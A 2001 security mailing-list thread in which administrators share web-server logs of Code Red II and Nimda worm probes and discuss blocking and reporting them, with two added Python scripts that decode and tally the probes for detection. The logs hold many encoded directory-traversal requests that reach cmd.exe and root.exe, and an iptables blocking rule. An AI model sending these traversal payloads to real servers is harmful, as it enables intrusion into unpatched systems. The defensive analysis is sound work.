Hi,

I thought Code RED was slowing down :-( Other than getting the regular GET "default.ida" requests, I have been logging things like this for the last two hours from different IPs.

1) Anyone else getting similar things, or is it me?
2) Is it worth bothering to send these logs to the provider of the IPs?

TIA

Sep 18 16:50:26 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.209.96.133:3317 -> 212.174.50.248:80
Sep 18 16:50:26 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.209.96.133:3317 -> 212.174.50.248:80
Sep 18 16:50:39 gardiyan last message repeated 3 times

::ffff:212.209.96.133%134580160 - - [18/Sep/2001:16:50:12 +0300] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:13 +0300] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:14 +0300] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:15 +0300] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:16 +0300] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:16 +0300] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:17 +0300] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:18 +0300] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:18 +0300] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:19 +0300] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:20 +0300] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:24 +0300] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:24 +0300] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:25 +0300] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:26 +0300] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:26 +0300] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""

--
Togan Muftuoglu
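The sixteen request paths in the log above, as an added example that is not part of the original post: a small Python normaliser that decodes the traversal encodings the probes use (double percent-encoding such as %255c, and the overlong UTF-8 byte pairs such as %c0%af and %c1%9c that the unpatched IIS decoder accepted as path separators) so that every variant collapses to the same decoded path, and a log monitor can match on the decoded form instead of keeping a list of encodings. The two less common byte pairs in the table (%c0%2f, %c1%1c) are taken from this log and assumed to be treated the same way; the classifier labels and the summarize() helper are my own, not from the list.

```python
"""Decode IIS probe request paths to a canonical form (added example).

The request variants in the log differ only in how the '..\\' or '../'
step is encoded.  Decoding them the way the vulnerable IIS decoder did
makes them all collapse to one path, so a detector can match on the
decoded path instead of maintaining a list of encodings.
"""
from urllib.parse import unquote_to_bytes

# Byte pairs that appear in the probes and that the unpatched IIS decoder
# accepted as a path separator although they are not valid UTF-8.
# %c0%af -> '/' and %c1%9c -> '\' are the well-known overlong encodings
# (MS00-078); the other two are taken from the same log excerpt and are
# assumed (not verified here) to be decoded the same way.
OVERLONG_SEPARATORS = {
    b"\xc0\xaf": b"/",
    b"\xc0\x2f": b"/",
    b"\xc1\x9c": b"\\",
    b"\xc1\x1c": b"\\",
}


def normalize_path(raw_path: str) -> str:
    """Return the path as a lenient (double-decoding) server would see it."""
    data = unquote_to_bytes(raw_path)            # first %xx decode
    for seq, sep in OVERLONG_SEPARATORS.items():
        data = data.replace(seq, sep)            # overlong UTF-8 -> separator
    if b"%" in data:                             # second decode (MS01-026 double-decode bug)
        data = unquote_to_bytes(data)
    data = data.replace(b"\\", b"/")             # backslash is a separator on Windows
    return data.decode("latin-1")


def resolve(path: str):
    """Collapse '.' and '..'; report whether the path climbs above the web root."""
    segments, escaped = [], False
    for seg in path.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if segments:
                segments.pop()
            else:
                escaped = True                   # more '..' than directories: left the root
        else:
            segments.append(seg)
    return "/" + "/".join(segments), escaped


def classify(request_line: str) -> dict:
    """Label one request line ('GET <target> HTTP/1.0') from the access log."""
    _method, target, _version = request_line.split(" ", 2)
    path, _, query = target.partition("?")
    decoded = normalize_path(path)
    resolved, escaped = resolve(decoded)
    name = resolved.rsplit("/", 1)[-1].lower()
    if name == "root.exe":
        kind = "root.exe backdoor probe"         # copy of cmd.exe left by an earlier compromise
    elif name == "cmd.exe" and escaped:
        kind = "traversal to cmd.exe"
    elif name == "cmd.exe":
        kind = "cmd.exe via exposed drive share" # only works if C:/D: are mapped as /c, /d
    else:
        kind = "other"
    return {"target": target, "decoded": decoded, "resolved": resolved,
            "escaped": escaped, "kind": kind, "query": query}


# Request targets copied from the log excerpt in the thread (constructed list).
PROBES = [
    "/scripts/root.exe?/c+dir",
    "/MSADC/root.exe?/c+dir",
    "/c/winnt/system32/cmd.exe?/c+dir",
    "/d/winnt/system32/cmd.exe?/c+dir",
    "/scripts/..%255c../winnt/system32/cmd.exe?/c+dir",
    "/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir",
    "/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir",
    "/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir",
    "/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir",
    "/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir",
    "/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir",
    "/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir",
    "/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir",
    "/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir",
    "/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir",
    "/scripts/..%252f../winnt/system32/cmd.exe?/c+dir",
]


def summarize(targets) -> dict:
    """Count request kinds; every encoding of the traversal lands in one bucket."""
    counts = {}
    for t in targets:
        kind = classify(f"GET {t} HTTP/1.0")["kind"]
        counts[kind] = counts.get(kind, 0) + 1
    return counts


if __name__ == "__main__":
    for t in PROBES:
        r = classify(f"GET {t} HTTP/1.0")
        print(f"{r['kind']:32} {r['resolved']:26} <- {t}")
    print(summarize(PROBES))
```

All twelve traversal variants resolve to the same /winnt/system32/cmd.exe, which is why matching on the decoded path (or simply on the literal strings cmd.exe and root.exe, which are never encoded in these probes) is more robust than enumerating the encodings; the 404s in the log mean the server did not have the file at that path, so none of these probes succeeded against it.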
Hi Togan!

On Tue, 18 Sep 2001, Togan Muftuoglu wrote:

> Hi,
>
> I thought Code RED was slowing down :-( Other than getting the regular GET "default.ida" requests, I have been logging things like this for the last two hours from different IPs.
>
> 1) Anyone else getting similar things, or is it me?

yeap, me too... I have this for the older ones:

$IPTABLES -I INPUT -p tcp --dport 80 -m string --string .ida -m state --state ESTABLISHED -j REJECT --reject-with tcp-reset

I guess we can just add another one for cmd.exe in place of `.ida'.

--
teodor
* teo@gecadsoftware.com <teo@gecadsoftware.com> on 18 Sep, 2001 wrote:

Hi Teodor

> yeap, me too...

Ooh, I thought I was going crazy :-)

> I have this for the older ones:
>
> $IPTABLES -I INPUT -p tcp --dport 80 -m string --string .ida -m state --state ESTABLISHED -j REJECT --reject-with tcp-reset
>
> I guess we can just add another one for cmd.exe in place of `.ida'.

Well, I am still on ipchains and using return-rst that Boris suggested to block IPs, and I am using that one.

Thanks for the info

--
Togan Muftuoglu
Is anyone writing the occurrence of WEB-IIS cmd.exe requests up for bugtraq already?

Cheers,
Yuri.
Jo,

On 18-Sep-01 Yuri Robbers wrote:

> Is anyone writing the occurrence of WEB-IIS cmd.exe requests up for bugtraq already?

This beast has been known for quite a while now, and Microsoft has already produced some cleaning tools and patches against it. It has been discussed on bugtraq already. A good overview of Code Red II can be found on incidents.org:

http://incidents.org/react/code_redII.php

This document states that the source of most Code Red/II attacks is PCs of home users who don't know about the standard IIS installation on their Win2k boxes. Code Red II is particularly nasty because it copies cmd.exe into a location where it is accessible from anywhere via the web. It also trojanizes explorer.exe to "offer" C: and D: to the world (also via the internet, of course). If the worm finds Chinese as the default installed language, it runs for 48 hours and starts 600 (!) threads (24/300 for other languages) to attack and infect other victims. The worm is also heavily killing bandwidth; imagine 600 instances of the worm trying to browse/scan their network neighbourhood; the worm code tries to attack the same subnet its host resides in, and the number of ARP requests is very high. This has led to a breakdown of some small ISPs in the last couple of days.

> Cheers,
> Yuri.
** Reply to message from Boris Lorenz <bolo@lupa.de> on Tue, 18 Sep 2001 18:23:09 +0200 (CEST)

guys, is this the same code red derivative that is being reported on telly? called nimda? (note this is admin, reversed <sigh>) These things seem to be escalating. Do we know anything about the objective of this little gem? (note sarcasm ship is ON)

Also note some haxor group apparently took down the Afghan Palace's website today .. so I would suspect the entire Web community will also come under increasing attacks (there IS always a sort of tit-for-tat aspect in these web *wars*, or so it seems <sigh>)

afterthought: Very funny, Scotty. Now beam down my clothes.
Yup,

On 18-Sep-01 jfweber@eternal.net wrote:

> ** Reply to message from Boris Lorenz <bolo@lupa.de> on Tue, 18 Sep 2001 18:23:09 +0200 (CEST)
>
> guys, is this the same code red derivative that is being reported on telly? called nimda? (note this is admin, reversed <sigh>) These things seem to be escalating. Do we know anything about the objective of this little gem? (note sarcasm ship is ON)

AFAIK, nimda is a Code Red-style worm which spreads via email. It usually hides inside an attachment called readme.exe and starts to browse the network neighbourhood once it has been activated, for example by double-clicking/previewing the attachment. It then scans for any vulnerable IIS servers and attacks them using the Unicode Web Traversal exploit. However, according to my records, nimda is not Code Red II but a deliberate transmutation of the Code Red design. There is some info about nimda on http://www.sarc.com/avcenter/venc/data/w32.nimda.a@mm.html .

> Also note some haxor group apparently took down the Afghan Palace's website today .. so I would suspect the entire Web community will also come under increasing attacks (there IS always a sort of tit-for-tat aspect in these web *wars*, or so it seems <sigh>)

Yep, I too think we're about to have a really wonderful time!

> afterthought: Very funny, Scotty. Now beam down my clothes.

:) LOL

Boris Lorenz <bolo@lupa.de>
---
I have the same log entries since 15:14! It looks like a new worm; I have 14 different IIS (exploit) scans per IP. But I can't find a new worm alert! -:(
-----Original Message-----
From: Togan Muftuoglu [mailto:toganm@users.sourceforge.net]

Hi,

I thought Code RED was slowing down :-( Other than getting the regular GET "default.ida" requests, I have been logging things like this for the last two hours from different IPs.

1) Anyone else getting similar things, or is it me?
2) Is it worth bothering to send these logs to the provider of the IPs?

TIA
-- Togan Muftuoglu
-- To unsubscribe, e-mail: suse-security-unsubscribe@suse.com For additional commands, e-mail: suse-security-help@suse.com
1200 lines since 15:14!!!

global.peapc.com - - [18/Sep/2001:16:50:10 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 -
global.peapc.com - - [18/Sep/2001:16:50:10 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 -
global.peapc.com - - [18/Sep/2001:16:50:10 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
global.peapc.com - - [18/Sep/2001:16:50:10 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
global.peapc.com - - [18/Sep/2001:16:50:10 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 -
global.peapc.com - - [18/Sep/2001:16:50:10 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 -
global.peapc.com - - [18/Sep/2001:16:50:10 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
global.peapc.com - - [18/Sep/2001:16:50:10 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
global.peapc.com - - [18/Sep/2001:16:50:11 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
global.peapc.com - - [18/Sep/2001:16:50:11 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
global.peapc.com - - [18/Sep/2001:16:50:11 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
global.peapc.com - - [18/Sep/2001:16:50:11 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
global.peapc.com - - [18/Sep/2001:16:50:12 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
global.peapc.com - - [18/Sep/2001:16:50:12 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
global.peapc.com - - [18/Sep/2001:16:50:12 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
global.peapc.com - - [18/Sep/2001:16:50:13 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
From the Symantec website:

http://www.symantec.com/avcenter/venc/data/w32.nimda.a@mm.html

W32.Nimda.A@mm
Discovered on: September 18, 2001
Last Updated on: September 18, 2001 at 08:15:23 AM PDT

This is the preliminary information known at this time. There is a new mass-mailing worm that utilizes email to propagate itself. The threat arrives as readme.exe in an email. In addition, the worm sends out probes to IIS servers attempting to spread by using the Unicode Web Traversal exploit similar to W32.BlueCode.Worm. Compromised servers may display a webpage prompting a visitor to download an Outlook file which contains the worm as an attachment. Also, the worm will create an open network share allowing access to the system. The worm will also attempt to spread via open network shares.
Same here ..., so:

1) it's not you
2) we have logged around 220 tries from 100 different IPs since 15:00 CEST today.

I guess it's a new worm that uses CRII-infected servers as base infrastructure.

Eric

Togan Muftuoglu wrote:
> Hi,
>
> I thought Code RED was slowing down :-( Other than getting the regular GET "default.ida" requests, I have been logging things like this for the last two hours from different IPs.
>
> 1) Anyone else getting similar things, or is it me?
> 2) Is it worth bothering to send these logs to the provider of the IPs?
>
> TIA
-- Togan Muftuoglu
--
-----------------------------------------------
| Eric Mueller
| E.Solutions Central Europe
| Solutions Consulting
| EDS Informationstechnologie und Service GmbH
| Eisenstr. 56
| 65428 Ruesselsheim, Germany
-----------------------------------------------
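Eric's tally (around 220 tries from 100 IPs) is the kind of figure you want before deciding whether contacting a provider is worth it. As an added example that is not code from the thread, here is a Python script that parses access-log lines in the two formats quoted in this thread (the "::ffff:"-prefixed IPv4-mapped source with a "%..." suffix, and the plain hostname form), keeps only the requests carrying the probe strings, groups them by source, and prints a per-source summary with hit count, distinct targets, time window, and how many probes were answered with 200 rather than 404. The sample lines are constructed from the formats in the thread; treating the "%..." suffix on the source field as a scope id to strip is an assumption.

```python
"""Per-source tally of IIS probe hits from access-log lines (added example).

Reads lines in the two formats quoted in the thread, keeps only the
requests that carry the probe markers, and groups them by source so the
result can be attached to an abuse report or compared across hosts.
"""
import re
from collections import defaultdict
from datetime import datetime

# Common log format prefix: source, ident, user, [timestamp], "request", status.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Strings that identify the Code Red / Code Red II / Nimda probes seen here;
# they appear literally in every variant, only the traversal step is encoded.
PROBE_MARKERS = ("cmd.exe", "root.exe", "default.ida")

# Constructed sample, built from the two log formats quoted in the thread.
SAMPLE_LINES = [
    '::ffff:212.209.96.133%134580160 - - [18/Sep/2001:16:50:12 +0300] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 - "" ""',
    '::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:13 +0300] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 - "" ""',
    '::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:16 +0300] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""',
    'global.peapc.com - - [18/Sep/2001:16:50:10 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 -',
    'global.peapc.com - - [18/Sep/2001:16:50:13 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -',
    '10.0.0.5 - - [18/Sep/2001:16:51:00 +0300] "GET /index.html HTTP/1.0" 200 1234',   # ordinary request
    'this line is not in common log format',                                           # must be skipped
]


def source_address(field: str) -> str:
    """Strip the IPv4-mapped IPv6 prefix and the '%...' suffix some dual-stack
    servers log (assumption: the suffix is a scope/interface id, not part of the address)."""
    if field.startswith("::ffff:"):
        field = field[len("::ffff:"):]
    return field.split("%", 1)[0]


def parse_line(line: str):
    """Return the fields we need from one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "src": source_address(m["src"]),
        "time": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
        "target": m["target"],
        "status": int(m["status"]),
    }


def is_probe(target: str) -> bool:
    """True if the request target carries one of the worm probe strings."""
    t = target.lower()
    return any(marker in t for marker in PROBE_MARKERS)


def tally(lines) -> dict:
    """Group probe hits by source: {src: {hits, targets, first, last, served}}."""
    per_src = defaultdict(lambda: {"hits": 0, "targets": set(),
                                   "first": None, "last": None, "served": 0})
    for line in lines:
        rec = parse_line(line)
        if rec is None or not is_probe(rec["target"]):
            continue
        s = per_src[rec["src"]]
        s["hits"] += 1
        s["targets"].add(rec["target"])
        s["first"] = rec["time"] if s["first"] is None else min(s["first"], rec["time"])
        s["last"] = rec["time"] if s["last"] is None else max(s["last"], rec["time"])
        if rec["status"] == 200:
            s["served"] += 1     # a 200 on a probe means the server actually had the file
    return dict(per_src)


def report(per_src: dict) -> str:
    """One summary line per source, busiest first; the header gives the totals."""
    total = sum(s["hits"] for s in per_src.values())
    lines = [f"{total} probe hits from {len(per_src)} source(s)"]
    for src, s in sorted(per_src.items(), key=lambda kv: -kv[1]["hits"]):
        span = (s["last"] - s["first"]).total_seconds()
        lines.append(f"{src}: {s['hits']} hits, {len(s['targets'])} distinct targets, "
                     f"{span:.0f}s window, {s['served']} answered 200")
    return "\n".join(lines)


if __name__ == "__main__":
    print(report(tally(SAMPLE_LINES)))
```

Feeding a real access log through tally() is just a matter of passing the open file object instead of SAMPLE_LINES. The "answered 200" column is the one to look at on your own servers: the 404s and 400s in this thread mean the probes found nothing, whereas a 200 on any of these targets is a sign the host itself needs attention before anyone's provider does.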
> Hi,
>
> I thought Code RED was slowing down :-( Other than getting the regular GET "default.ida" requests, I have been logging things like this for the last two hours from different IPs.
>
> 1) Anyone else getting similar things, or is it me?

me too. I put up a new server at a cohost facility; <1 minute after turning on httpd for the first time, guess which file was requested? I get a few hundred to a few thousand a day still on various machines.

> 2) Is it worth bothering to send these logs to the provider of the IPs?

yes and no. some yes, some no.

> TIA

Kurt Seifried, kurt@seifried.org
A15B BEE5 B391 B9AD B0EF AEB0 AD63 0B4E AD56 E574
http://www.seifried.org/security/
On Tue, Sep 18, 2001 at 05:22:24PM +0300, Togan Muftuoglu wrote:
[...]

If anyone is interested: IIS Worm-Registry, http://worm.jungnickel.com

--
Mit freundlichen Gruessen / Yours sincerely
Wolfram Schlich * E-Mail: wolfram@schlich.org * ICQ: UIN 35713642
Postal: Berghof, D-56626 Andernach-Kell * Phone: +49-(0)2636-941194
participants (10)

- Boris Lorenz
- Eric Mueller
- jfweber@eternal.net
- Kurt Seifried
- Lars Schlimpert
- Matthew Thomas
- teo@gecadsoftware.com
- Togan Muftuoglu
- Wolfram Schlich
- Yuri Robbers